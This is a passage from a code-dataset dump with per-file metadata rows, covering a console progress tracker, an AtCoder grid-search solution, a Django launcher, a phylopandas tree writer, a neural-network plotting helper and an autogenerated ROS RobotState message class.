        # argument; callers pass self._ticks anyway, so behavior matches.
        return self._symbols.spin_marks[self._ticks % len(self._symbols.spin_marks)]

    def _GetStagedCompletedSuffix(self, status):
        return status.value

    def _ValidateStage(self, stage):
        """Validates the stage belongs to the tracker and has not been completed."""
        if stage not in self._stages:
            raise ValueError('This stage does not belong to this progress tracker.')
        if stage in self._completed_stages:
            raise ValueError('This stage has already completed.')

    def StartStage(self, stage):
        """Informs the progress tracker that this stage has started."""
        self._ValidateStage(stage)
        with self._lock:
            self._running_stages.add(stage)
            stage.status = StageCompletionStatus.RUNNING
            self._StartStage(stage)

    def _StartStage(self, stage):
        # Subclass hook; called with self._lock held.
        return

    def UpdateStage(self, stage, message):
        """Updates a stage in the progress tracker."""
        # TODO(b/109928970): Add support for progress bars.
        self._ValidateStage(stage)
        with self._lock:
            stage.message = message

    def CompleteStage(self, stage, message=None):
        """Informs the progress tracker that this stage has completed."""
        self._ValidateStage(stage)
        with self._lock:
            stage.status = StageCompletionStatus.SUCCESS
            stage._is_done = True  # pylint: disable=protected-access
            self._running_stages.remove(stage)
            if message is not None:
                stage.message = message
            self._CompleteStage(stage)
        self.Tick()  # This ensures output is properly flushed out.

    def _CompleteStage(self, stage):
        # Subclass hook; called with self._lock held.
        return

    def FailStage(self, stage, failure_exception=None, message=None):
        """Informs the progress tracker that this stage has failed."""
        self._ValidateStage(stage)
        with self._lock:
            stage.status = StageCompletionStatus.FAILED
            stage._is_done = True  # pylint: disable=protected-access
            self._running_stages.remove(stage)
            if message is not None:
                stage.message = message
            self._FailStage(stage, failure_exception, message)
        self.Tick()  # This ensures output is properly flushed out.
        if failure_exception:
            self._PrintExitOutput(failed=True)
            # Mark handled so __exit__ doesn't print failure output twice.
            self._exception_is_uncaught = False
            raise failure_exception  # pylint: disable=raising-bad-type
class _NormalStagedProgressTracker(_BaseStagedProgressTracker):
    """A context manager for telling the user about long-running progress.

    This class uses the core.console.multiline.ConsoleOutput interface for
    outputting. The header and each stage is defined as a message object
    contained by the ConsoleOutput message.
    """

    def __init__(self, *args, **kwargs):
        # FIFO of started stages; only the head is rendered at any time.
        self._running_stages_queue = []
        self._stage_being_displayed = None
        super(_NormalStagedProgressTracker, self).__init__(*args, **kwargs)

    def _SetupOutput(self):
        # Console outputting objects
        self._console_output = multiline.SimpleSuffixConsoleOutput(self._stream)
        self._header_message = self._console_output.AddMessage(self._message)
        self._current_stage_message = self._header_message

    def _FailStage(self, stage, failure_exception=None, message=None):
        # Mark every other queued stage as interrupted; the failing stage
        # itself was already marked FAILED by the base class.
        for running_stage in self._running_stages_queue:
            if stage != running_stage:
                running_stage.status = StageCompletionStatus.INTERRUPTED
                running_stage._is_done = True  # pylint: disable=protected-access

    def _StartStage(self, stage):
        """Informs the progress tracker that this stage has started."""
        self._running_stages_queue.append(stage)
        if self._stage_being_displayed is None:
            self._LoadNextStageForDisplay()

    def _LoadNextStageForDisplay(self):
        # Promotes the queue head to the display slot. Returns True on
        # success; implicitly returns None when the queue is empty.
        if self._running_stages_queue:
            self._stage_being_displayed = self._running_stages_queue[0]
            self._SetUpOutputForStage(self._stage_being_displayed)
            return True

    def Tick(self):
        """Give a visual indication to the user that some progress has been made.

        Output is sent to sys.stderr. Nothing is shown if output is not a TTY.
        This method also handles loading new stages and flushing out completed
        stages.

        Returns:
          Whether progress has completed.
        """
        with self._lock:
            if not self._done:
                self._ticks += 1
                # Flush output for any stages that may already be finished
                if self._stage_being_displayed is None:
                    self._LoadNextStageForDisplay()
                else:
                    while (self._running_stages_queue and
                           self._running_stages_queue[0].is_done):
                        completed_stage = self._running_stages_queue.pop(0)
                        self._completed_stages.append(completed_stage)
                        completion_status = self._GetStagedCompletedSuffix(
                            self._stage_being_displayed.status)
                        self._Print(completion_status)
                        if not self._LoadNextStageForDisplay():
                            self._stage_being_displayed = None
                if self._stage_being_displayed:
                    self._Print(self._GetTickMark(self._ticks))
        return self._done

    def _PrintExitOutput(self, aborted=False, failed=False):
        """Handles the final output for the progress tracker."""
        self._SetupExitOutput()
        if aborted:
            msg = self._aborted_message or 'Aborted.'
        elif failed:
            msg = self._failure_message or 'Failed.'
        else:
            msg = self._success_message or 'Done.'
        if self._done_message_callback:
            msg += ' ' + self._done_message_callback()
        self._Print(msg + '\n')

    def _SetupExitOutput(self):
        """Sets up output to print out the closing line."""
        self._current_stage_message = self._console_output.AddMessage('')

    def _HandleUncaughtException(self, exc_value):
        # The first print is to signal exiting the stage. The second print
        # handles the output for exiting the progress tracker.
        if isinstance(exc_value, console_io.OperationCancelledError):
            self._Print('aborted by ctrl-c')
            self._PrintExitOutput(aborted=True)
        else:
            # This means this was an uncaught exception. This ideally
            # should be handled by the implementer
            self._Print(
                self._GetStagedCompletedSuffix(StageCompletionStatus.FAILED))
            self._PrintExitOutput(failed=True)

    def _SetUpOutputForStage(self, stage):
        # Suffix callback so UpdateStage() messages render after the header.
        def _FormattedCallback():
            if stage.message:
                return ' ' + stage.message + '...'
            return None

        self._current_stage_message = self._console_output.AddMessage(
            stage.header,
            indentation_level=1,
            detail_message_callback=_FormattedCallback)

    def _Print(self, message=''):
        """Prints an update containing message to the output stream.

        Args:
          message: str, suffix of message
        """
        if not self._output_enabled:
            return
        if self._current_stage_message:
            self._console_output.UpdateMessage(self._current_stage_message, message)
            self._console_output.UpdateConsole()
class _NonInteractiveStagedProgressTracker(_NormalStagedProgressTracker):
    """A context manager for telling the user about long-running progress.

    Non-interactive variant: emits plain, append-only text with dot tick
    marks instead of rewriting console lines.
    """

    def _SetupOutput(self):
        """Prints the tracker's top-level message once, on its own line."""
        self._Print('{}\n'.format(self._message))

    def _SetupExitOutput(self):
        """No-op: append-only output needs no closing-line setup."""
        return

    def _GetTickMark(self, ticks):
        """Every tick renders as a bare dot in non-interactive mode."""
        del ticks  # Unused: all ticks look the same.
        return '.'

    def _GetStagedCompletedSuffix(self, status):
        """Completion suffixes each end the current output line."""
        return '{}\n'.format(status.value)

    def _SetUpOutputForStage(self, stage):
        """Prints the stage header (plus any detail message) as plain text."""
        parts = [stage.header]
        if stage.message:
            parts.append(' ' + stage.message + '...')
        self._Print(''.join(parts))

    def _Print(self, message=''):
        """Writes message straight to the stream when output is enabled.

        Args:
          message: str, suffix of message
        """
        if self._output_enabled:
            self._stream.write(message)
class _MultilineStagedProgressTracker(_BaseStagedProgressTracker):
    """A context manager for telling the user about long-running progress.

    This class uses the core.console.multiline.ConsoleOutput interface for
    outputting. The header and each stage is defined as a message object
    contained by the ConsoleOutput message.
    """

    def UpdateHeaderMessage(self, message):
        # Next tick will handle actually updating the message. Using tick here to
        # update the message will cause a deadlock when _NotifyUninterruptableError
        # is called.
        self._header_stage.message = message

    def _UpdateHeaderMessage(self, prefix):
        message = prefix + self._message
        if self._header_stage.message:
            message += ' ' + self._header_stage.message
        self._console_output.UpdateMessage(self._header_message, message)

    def _NotifyUninterruptableError(self):
        with self._lock:
            self.UpdateHeaderMessage('This operation cannot be cancelled.')
        # Tick() acquires the (non-reentrant) lock itself, so it must run
        # after the lock above is released.
        self.Tick()

    def _SetupExitOutput(self):
        """Sets up output to print out the closing line."""
        return self._console_output.AddMessage('')

    def _PrintExitOutput(self, aborted=False, failed=False):
        """Handles the final output for the progress tracker."""
        output_message = self._SetupExitOutput()
        if aborted:
            msg = self._aborted_message or 'Aborted.'
            # Aborted is the same as overall failed progress.
            self._header_stage.status = StageCompletionStatus.FAILED
        elif failed:
            msg = self._failure_message or 'Failed.'
            self._header_stage.status = StageCompletionStatus.FAILED
        else:
            msg = self._success_message or 'Done.'
            self._header_stage.status = StageCompletionStatus.SUCCESS
        if self._done_message_callback:
            msg += ' ' + self._done_message_callback()
        self._console_output.UpdateMessage(output_message, msg)
        # If for some reason some stage did not complete, mark it as interrupted.
        self._Print(self._symbols.interrupted)

    def _SetupOutput(self):
        # Console outputting objects
        self._maintain_queue = False
        self._console_output = multiline.MultilineConsoleOutput(self._stream)
        self._header_message = self._console_output.AddMessage(self._message)
        self._header_stage = Stage('')  # Use a Stage object to hold header state.
        self._header_stage.status = StageCompletionStatus.RUNNING
        # One console message per stage, pre-created so each stage renders
        # on its own line from the start.
        self._stage_messages = dict()
        for stage in self._stages:
            self._stage_messages[stage] = self._console_output.AddMessage(
                stage.header, indentation_level=1)
            self._UpdateStageTickMark(stage)
        self._console_output.UpdateConsole()

    def _GenerateStagePrefix(self, stage_status, tick_mark):
        # Terminal states replace the spinner mark with a fixed symbol.
        if stage_status == StageCompletionStatus.NOT_STARTED:
            tick_mark = self._symbols.not_started
        elif stage_status == StageCompletionStatus.SUCCESS:
            tick_mark = self._symbols.success
        elif stage_status == StageCompletionStatus.FAILED:
            tick_mark = self._symbols.failed
        elif stage_status == StageCompletionStatus.INTERRUPTED:
            tick_mark = self._symbols.interrupted
        # Pad so stage text stays column-aligned regardless of mark width.
        return tick_mark + ' ' * (self._symbols.prefix_length - len(tick_mark))

    def _UpdateStageTickMark(self, stage, tick_mark=''):
        prefix = self._GenerateStagePrefix(stage.status, tick_mark)
        message = stage.header
        if stage.message:
            message += ' ' + stage.message
        self._console_output.UpdateMessage(
            self._stage_messages[stage], prefix + message)

    def _FailStage(self, stage, exception=None, message=None):
        """Informs the progress tracker that this stage has failed."""
        self._UpdateStageTickMark(stage)
        if exception:
            # A raising failure aborts the whole tracker, so flag all other
            # still-running stages as interrupted.
            for other_stage in self._stages:
                if (other_stage != stage and
                        other_stage.status == StageCompletionStatus.RUNNING):
                    other_stage.status = StageCompletionStatus.INTERRUPTED
                    other_stage._is_done = True  # pylint: disable=protected-access

    def _CompleteStage(self, stage):
        self._UpdateStageTickMark(stage)

    def Tick(self):
        """Give a visual indication to the user that some progress has been made.

        Output is sent to sys.stderr. Nothing is shown if output is not a TTY.

        Returns:
          Whether progress has completed.
        """
        with self._lock:
            if not self._done:
                self._ticks += 1
                self._Print(self._GetTickMark(self._ticks))
        return self._done

    def _Print(self, tick_mark=''):
        """Prints an update containing message to the output stream.

        Args:
          tick_mark: str, suffix of message
        """
        if not self._output_enabled:
            return
        header_prefix = self._GenerateStagePrefix(
            self._header_stage.status, tick_mark)
        self._UpdateHeaderMessage(header_prefix)
        # Refresh the spinner on every stage that is currently running.
        for stage in self._running_stages:
            self._UpdateStageTickMark(stage, tick_mark)
        self._console_output.UpdateConsole()
class _NoOpStagedProgressTracker(_StagedProgressTrackerInterface):
    """A staged progress tracker that doesn't do anything.

    Used when user output is disabled. It still installs a SIGINT handler so
    ctrl-c semantics (raising OperationCancelledError when interruptable)
    are preserved.
    """

    def __init__(self, stages, interruptable, aborted_message):
        super(_NoOpStagedProgressTracker, self).__init__(stages)
        self._interruptable = interruptable
        self._aborted_message = aborted_message
        self._done = False

    def __enter__(self):
        def _CtrlCHandler(unused_signal, unused_frame):
            if self._interruptable:
                raise console_io.OperationCancelledError(self._aborted_message)
        try:
            self._old_signal_handler = signal.signal(signal.SIGINT, _CtrlCHandler)
            self._restore_old_handler = True
        except ValueError:
            # signal.signal only works in the main thread (e.g. gcloud
            # interactive runs trackers off the main thread). Mirror the
            # guard in _BaseStagedProgressTracker instead of crashing.
            self._restore_old_handler = False
        return self

    def _Print(self, message=''):
        # No-op tracker never prints anything.
        return

    def Tick(self):
        return self._done

    def StartStage(self, stage):
        return

    def UpdateStage(self, stage, message):
        return

    def CompleteStage(self, stage, message=None):
        return

    def FailStage(self, stage, exception, message=None):
        raise exception

    def __exit__(self, exc_type, exc_val, exc_tb):
        self._done = True
        # Only restore the handler we actually installed in __enter__.
        if self._restore_old_handler:
            try:
                signal.signal(signal.SIGINT, self._old_signal_handler)
            except ValueError:
                pass  # Only works in the main thread.
class _StubStagedProgressTracker(_NoOpStagedProgressTracker):
    """Staged tracker that only prints deterministic start and end points.

    No UX about tracking should be exposed here. This is strictly for being able
    to tell that the tracker ran, not what it actually looks like.
    """

    def __init__(self, message, stages, interruptable, aborted_message):
        super(_StubStagedProgressTracker, self).__init__(
            stages, interruptable, aborted_message)
        self._stream = sys.stderr
        self._message = message
        # Outcome record, emitted as a JSON UX stub on exit.
        self._succeeded_stages = []
        self._failed_stage = None

    def CompleteStage(self, stage, message=None):
        """Records the completed stage's header for the exit stub."""
        self._succeeded_stages.append(stage.header)

    def FailStage(self, stage, exception, message=None):
        """Records the failing stage's header, then re-raises."""
        self._failed_stage = stage.header
        raise exception

    def __exit__(self, exc_type, exc_val, exc_tb):
        if not exc_val:
            status = 'SUCCESS'
        else:
            cancelled = isinstance(exc_val, console_io.OperationCancelledError)
            status = 'INTERRUPTED' if cancelled else 'FAILURE'

        if log.IsUserOutputEnabled():
            stub = console_io.JsonUXStub(
                console_io.UXElementType.STAGED_PROGRESS_TRACKER,
                message=self._message, status=status,
                succeeded_stages=self._succeeded_stages,
                failed_stage=self._failed_stage)
            self._stream.write(stub + '\n')
        return super(
            _StubStagedProgressTracker, self).__exit__(exc_type, exc_val, exc_tb)
| [
"cloudsdk.mirror@gmail.com"
] | cloudsdk.mirror@gmail.com |
6d92d61ee82ad1d16aafdda4e576c854454eb802 | eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e | /atcoder/abc/abc301-400/abc302/b.py | 289515c914038268c91d8ae04c92359c07516a7e | [] | no_license | reo11/AtCoder | 4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9 | 69c6d67f05cb9190d8fb07204488cd7ce4d0bed2 | refs/heads/master | 2023-08-28T10:54:50.859288 | 2023-08-22T18:52:47 | 2023-08-22T18:52:47 | 162,085,118 | 4 | 0 | null | 2023-07-01T14:17:28 | 2018-12-17T06:31:10 | Python | UTF-8 | Python | false | false | 960 | py | h, w = map(int, input().split())
# ABC302 B: find "snuke" written in a straight line (any of 8 directions)
# inside an h x w character grid, and print the five cell coordinates.
grid = [list(input()) for _ in range(h)]
word = list("snuke")
directions = [
    (1, 0), (-1, 0), (0, 1), (0, -1),
    (1, 1), (-1, 1), (1, -1), (-1, -1),
]
for r in range(h):
    for c in range(w):
        if grid[r][c] != word[0]:
            continue
        for dc, dr in directions:
            cells = [f"{r + 1} {c + 1}"]
            ok = True
            for step in range(1, 5):
                rr = r + step * dr
                cc = c + step * dc
                # Bounds first, then the character match, exactly as the
                # scan requires (avoids negative wrap-around indexing).
                if not (0 <= rr < h and 0 <= cc < w) or grid[rr][cc] != word[step]:
                    ok = False
                    break
                cells.append(f"{rr + 1} {cc + 1}")
            if ok:
                print(*cells, sep="\n")
                exit()
| [
"reohirao116@gmail.com"
] | reohirao116@gmail.com |
a6b556baf1bf87f81e28b23ca9146eb2f4c411af | a683503b48ba7c0a0563668ccdd3a455e2ce0053 | /bin/django-admin.py | a4eb5213e7fadb6676855b7e9d2b591a4ab0eef5 | [] | no_license | dskiranraj/survaider | 1c60d46c01167246617b1ba3dc0bde5b69b67a06 | 5d601321aecc9b831624d8a4a83ca84088805095 | refs/heads/master | 2020-06-22T23:08:18.108169 | 2019-07-23T12:24:43 | 2019-07-23T12:24:43 | 198,425,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | #!/home/ambertag/Desktop/survaider/bin/python3.6
from django.core import management

if __name__ == "__main__":
    # Thin entry point: delegate argv handling to Django's management CLI.
    management.execute_from_command_line()
| [
"you@example.com"
] | you@example.com |
518b4196e8bf056b4b5e8da9a147b688b1451695 | 6634436cf4f0e4d674cf497e57e5750f9ac415aa | /phylopandas/treeio/write.py | cbb1ec02fff13e127e16464606f9e2e1c78e1529 | [
"BSD-3-Clause"
] | permissive | ScottCarrara/phylopandas | dc946d552ad48b6314a60e845356318b33fbe860 | f163c4a2b9369eb32f6c8f3793f711f6fe4e6130 | refs/heads/master | 2020-05-19T19:44:45.752770 | 2018-11-12T06:55:47 | 2018-11-12T06:56:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,846 | py | import pandas
import dendropy
def _write_doc_template(schema):
s = """Write to {} format.
Parameters
----------
filename : str
File to write {} string to. If no filename is given, a {} string
will be returned.
taxon_col : str (default='sequence')
Sequence column name in DataFrame.
taxon_annotations : str
List of columns to annotation in the tree taxon.
node_col : str (default='id')
ID column name in DataFrame
node_annotations : str
List of columns to annotation in the node taxon.
branch_lengths : bool (default=False)
If True, use only the ID column to label sequences in fasta.
""".format(schema, schema, schema)
return s
def _pandas_df_to_dendropy_tree(
df,
taxon_col='uid',
taxon_annotations=[],
node_col='uid',
node_annotations=[],
branch_lengths=True,
):
"""Turn a phylopandas dataframe into a dendropy tree.
Parameters
----------
df : DataFrame
DataFrame containing tree data.
taxon_col : str (optional)
Column in dataframe to label the taxon. If None, the index will be used.
taxon_annotations : str
List of columns to annotation in the tree taxon.
node_col : str (optional)
Column in dataframe to label the nodes. If None, the index will be used.
node_annotations : str
List of columns to annotation in the node taxon.
branch_lengths : bool
If True, inclues branch lengths.
"""
if isinstance(taxon_col, str) is False:
raise Exception("taxon_col must be a string.")
if isinstance(node_col, str) is False:
raise Exception("taxon_col must be a string.")
# Construct a list of nodes from dataframe.
taxon_namespace = dendropy.TaxonNamespace()
nodes = {}
for idx in df.index:
# Get node data.
data = df.loc[idx]
# Get taxon for node (if leaf node).
taxon = None
if data['type'] == 'leaf':
taxon = dendropy.Taxon(label=data[taxon_col])
# Add annotations data.
for ann in taxon_annotations:
taxon.annotations.add_new(ann, data[ann])
taxon_namespace.add_taxon(taxon)
# Get label for node.
label = data[node_col]
# Get edge length.
edge_length = None
if branch_lengths is True:
edge_length = data['length']
# Build a node
n = dendropy.Node(
taxon=taxon,
label=label,
edge_length=edge_length
)
# Add node annotations
for ann in node_annotations:
n.annotations.add_new(ann, data[ann])
nodes[idx] = n
# Build branching pattern for nodes.
root = None
for idx, node in nodes.items():
# Get node data.
data = df.loc[idx]
# Get children nodes
children_idx = df[df['parent'] == data['id']].index
children_nodes = [nodes[i] for i in children_idx]
# Set child nodes
nodes[idx].set_child_nodes(children_nodes)
# Check if this is root.
if data['parent'] is None:
root = nodes[idx]
# Build tree.
tree = dendropy.Tree(
seed_node=root,
taxon_namespace=taxon_namespace
)
return tree
def _write(
    df,
    filename=None,
    schema='newick',
    taxon_col='uid',
    taxon_annotations=[],
    node_col='uid',
    node_annotations=[],
    branch_lengths=True,
    **kwargs
):
    """Write a phylopandas tree DataFrame to various formats.

    Parameters
    ----------
    df : DataFrame
        DataFrame containing tree data.
    filename : str
        Filepath to write out tree. If None, the serialized string is
        returned instead.
    schema : str
        Tree format to write out (any schema dendropy supports, e.g.
        'newick', 'nexus', 'nexml').
    taxon_col : str (default='uid')
        Column in dataframe to label the taxon.
    taxon_annotations : str
        List of columns to annotation in the tree taxon.
    node_col : str (default='uid')
        Column in dataframe to label the nodes.
    node_annotations : str
        List of columns to annotation in the node taxon.
    branch_lengths : bool
        If True, includes branch lengths.

    Returns
    -------
    str or None
        Serialized tree string when ``filename`` is None, otherwise None.
    """
    tree = _pandas_df_to_dendropy_tree(
        df,
        taxon_col=taxon_col,
        taxon_annotations=taxon_annotations,
        node_col=node_col,
        node_annotations=node_annotations,
        branch_lengths=branch_lengths,
    )
    # Bug fix: removed a stray debug `print(schema)` from the write path.
    if filename is not None:
        tree.write(path=filename, schema=schema, suppress_annotations=False,
                   **kwargs)
    else:
        return tree.as_string(schema=schema)
def _write_method(schema):
    """Build a DataFrame-accessor method that writes trees in ``schema``."""
    def method(
        self,
        filename=None,
        schema=schema,
        taxon_col='uid',
        taxon_annotations=[],
        node_col='uid',
        node_annotations=[],
        branch_lengths=True,
        **kwargs):
        # Delegate to the generic writer, pulling the DataFrame off the
        # accessor instance.
        return _write(
            self._data,
            filename=filename,
            schema=schema,
            taxon_col=taxon_col,
            taxon_annotations=taxon_annotations,
            node_col=node_col,
            node_annotations=node_annotations,
            branch_lengths=branch_lengths,
            **kwargs)

    # Attach the schema-specific docstring generated from the template.
    method.__doc__ = _write_doc_template(schema)
    return method
def _write_function(schema):
    """Build a module-level function that writes trees in ``schema``."""
    def func(
        data,
        filename=None,
        schema=schema,
        taxon_col='uid',
        taxon_annotations=[],
        node_col='uid',
        node_annotations=[],
        branch_lengths=True,
        **kwargs):
        # Delegate to the generic writer with the DataFrame passed directly.
        return _write(
            data,
            filename=filename,
            schema=schema,
            taxon_col=taxon_col,
            taxon_annotations=taxon_annotations,
            node_col=node_col,
            node_annotations=node_annotations,
            branch_lengths=branch_lengths,
            **kwargs)

    # Attach the schema-specific docstring generated from the template.
    func.__doc__ = _write_doc_template(schema)
    return func
def to_dendropy(
        data,
        taxon_col='uid',
        taxon_annotations=[],
        node_col='uid',
        node_annotations=[],
        branch_lengths=True):
    """Convert a phylopandas tree DataFrame into a ``dendropy.Tree``."""
    return _pandas_df_to_dendropy_tree(
        data,
        taxon_col=taxon_col,
        taxon_annotations=taxon_annotations,
        node_col=node_col,
        node_annotations=node_annotations,
        branch_lengths=branch_lengths)
# Module-level writer functions generated from the factory, one per
# supported dendropy output schema.
to_newick = _write_function('newick')
to_nexml = _write_function('nexml')
to_nexus_tree = _write_function('nexus')
| [
"zachsailer@gmail.com"
] | zachsailer@gmail.com |
30a59c7f55545090058475dd238a15e2ff6ab9e4 | 4b1b00f977c27d71b6fe0fab64a9ca09a85a4c09 | /src/vis/visualization.py | 89649b4a0d43ebb6222831997b7667cc2a2da414 | [] | no_license | zhouyanasd/SNN_framework | 67e3d31ef9e709d0b8cb1d18618291f264b006f6 | ba3ab08ac350507120d1ab840701b27014db70e2 | refs/heads/master | 2021-09-29T02:38:10.144613 | 2017-10-24T02:13:10 | 2017-10-24T02:13:10 | 108,064,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | import src
import numpy as np
import matplotlib.pyplot as plt
class Visualization(object):
    """Matplotlib helpers for plotting spiking-network simulation traces."""

    def __init__(self, total_time):
        # Shared time axis 0 .. total_time - 1 used by the plots below.
        self.t = np.arange(0, total_time)

    def show(self):
        """Render all pending matplotlib figures."""
        plt.show()

    def I(self, neuron):
        """Print and plot a neuron's input current over the time axis."""
        current = neuron.I
        print(current)
        plt.figure()
        plt.plot(self.t[:], current)
        plt.show()

    def add_fired_fig(self, fig, Liquid):
        """Raster-plot spike times for every neuron in the first reservoir."""
        axes = fig.add_subplot(3, 1, 2)
        neuron_list = Liquid.reservoir_list[0].neuron_list
        for idx in range(neuron_list.size):
            for spike_time in neuron_list[idx].fired_sequence:
                axes.scatter(spike_time, 0.5 * idx, alpha=.5)

    def add_data_fig(self, fig, data):
        """Plot a 1-D series against its own index axis."""
        xs = np.arange(0, data.size)
        plt.plot(xs, data)

    def add_test_result(self, fig, result, label):
        """Overlay predictions (red dots) on the target series (blue dashes)."""
        xs = np.arange(0, result.size)
        plt.scatter(xs, result, color="red")
        plt.plot(label, "b--", color="blue")

    def add_neu_mem(self, fig, neu):
        """Plot the first membrane-potential trace of a single neuron."""
        plt.plot(self.t, neu.membrane_potential[:, 0])

    def add_neu_mem_n(self, Liquid, start, end):
        """Create one figure per neuron in [start, end) showing its potential."""
        for offset in range(end - start):
            fig = plt.figure(figsize=(15, 4))
            neuron = Liquid.reservoir_list[0].neuron_list[offset + start]
            self.add_neu_mem(fig, neuron)
| [
"zhouyanasd@gmail.com"
] | zhouyanasd@gmail.com |
227f04b3d503b43d52399f13429478dcd52f392a | 72cc56c488930ed632070a1d23c340b6835c24b5 | /Robotics/ca/devel/lib/python2.7/dist-packages/caros_universalrobot/msg/_RobotState.py | 3daabcd8d230f21fe0211e557214ddd8aeca826b | [] | no_license | Keerthikan/ROVI2 | 856b9cb9706ee3ab14f41ce51cc5c6a5f8113225 | 46c6f3dac80207935d87a6f6a39b48c766e302a4 | refs/heads/master | 2021-01-18T22:07:57.035506 | 2016-05-19T08:58:13 | 2016-05-19T08:58:13 | 51,436,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,508 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from caros_universalrobot/RobotState.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import caros_common_msgs.msg
import std_msgs.msg
class RobotState(genpy.Message):
    # Autogenerated genpy serialization class — regenerate rather than edit.
    # MD5 digest of the message definition; ROS uses it to check that
    # publisher and subscriber agree on the message layout.
    _md5sum = "085b53002a7297f33a35f15c71b21bba"
    _type = "caros_universalrobot/RobotState"
    _has_header = True #flag to mark the presence of a Header object
    # Full .msg definition text (including dependent message types).
    _full_text = """#RobotState represents the state of one a single robot in the setup.
#Header containing information about time and frameid
Header header
#Joint configuration.
# Angles should be represented as radians and distances in meters.
caros_common_msgs/Q q
#Velocities should be represented as radians per sec
caros_common_msgs/Q dq
#Is the robot moving
bool is_moving
#Is the robot in collision
bool is_colliding
#Is Emergency Stopped
bool e_stopped
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: caros_common_msgs/Q
# A configuration Q
float64[] data
"""
    # Message fields and their declared ROS types, in serialization order.
    __slots__ = ['header','q','dq','is_moving','is_colliding','e_stopped']
    _slot_types = ['std_msgs/Header','caros_common_msgs/Q','caros_common_msgs/Q','bool','bool','bool']
    def __init__(self, *args, **kwds):
        """
        Constructor. Any message fields that are implicitly/explicitly
        set to None will be assigned a default value. The recommend
        use is keyword arguments as this is more robust to future message
        changes.  You cannot mix in-order arguments and keyword arguments.

        The available fields are:
           header,q,dq,is_moving,is_colliding,e_stopped

        :param args: complete set of field values, in .msg order
        :param kwds: use keyword arguments corresponding to message field names
        to set specific fields.
        """
        if args or kwds:
            super(RobotState, self).__init__(*args, **kwds)
            #message fields cannot be None, assign default values for those that are
            if self.header is None:
                self.header = std_msgs.msg.Header()
            if self.q is None:
                self.q = caros_common_msgs.msg.Q()
            if self.dq is None:
                self.dq = caros_common_msgs.msg.Q()
            if self.is_moving is None:
                self.is_moving = False
            if self.is_colliding is None:
                self.is_colliding = False
            if self.e_stopped is None:
                self.e_stopped = False
        else:
            # No arguments given: initialize every field to its type default.
            self.header = std_msgs.msg.Header()
            self.q = caros_common_msgs.msg.Q()
            self.dq = caros_common_msgs.msg.Q()
            self.is_moving = False
            self.is_colliding = False
            self.e_stopped = False
    def _get_types(self):
        """
        internal API method
        """
        # Declared ROS type string for each slot, in serialization order.
        return self._slot_types
    def serialize(self, buff):
        """
        serialize message into buffer
        :param buff: buffer, ``StringIO``
        """
        # Wire format (little-endian): header triple (seq, secs, nsecs), a
        # length-prefixed frame_id string, each Q array as a uint32 count
        # followed by that many float64s, then three single-byte bools.
        try:
            _x = self
            buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
            _x = self.header.frame_id
            length = len(_x)
            # Python 2/3 compatible string handling: encode text as UTF-8.
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            if python3:
                buff.write(struct.pack('<I%sB'%length, length, *_x))
            else:
                buff.write(struct.pack('<I%ss'%length, length, _x))
            length = len(self.q.data)
            buff.write(_struct_I.pack(length))
            pattern = '<%sd'%length
            buff.write(struct.pack(pattern, *self.q.data))
            length = len(self.dq.data)
            buff.write(_struct_I.pack(length))
            pattern = '<%sd'%length
            buff.write(struct.pack(pattern, *self.dq.data))
            _x = self
            buff.write(_struct_3B.pack(_x.is_moving, _x.is_colliding, _x.e_stopped))
        except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
        except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``

    Inverse of :meth:`serialize`; advances a start/end cursor through the
    buffer.  Raises ``genpy.DeserializationError`` when the buffer is too
    short for the declared field sizes.
    """
    try:
        # lazily create sub-messages so a partially-built instance can
        # still be deserialized into
        if self.header is None:
            self.header = std_msgs.msg.Header()
        if self.q is None:
            self.q = caros_common_msgs.msg.Q()
        if self.dq is None:
            self.dq = caros_common_msgs.msg.Q()
        end = 0
        _x = self
        start = end
        end += 12
        # fixed-size header prefix: seq, stamp.secs, stamp.nsecs (3x uint32)
        (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
            self.header.frame_id = str[start:end].decode('utf-8')
        else:
            self.header.frame_id = str[start:end]
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        pattern = '<%sd'%length
        start = end
        end += struct.calcsize(pattern)
        self.q.data = struct.unpack(pattern, str[start:end])
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        pattern = '<%sd'%length
        start = end
        end += struct.calcsize(pattern)
        self.dq.data = struct.unpack(pattern, str[start:end])
        _x = self
        start = end
        end += 3
        (_x.is_moving, _x.is_colliding, _x.e_stopped,) = _struct_3B.unpack(str[start:end])
        # booleans arrive as uint8; normalize back to bool
        self.is_moving = bool(self.is_moving)
        self.is_colliding = bool(self.is_colliding)
        self.e_stopped = bool(self.e_stopped)
        return self
    except struct.error as e:
        raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module

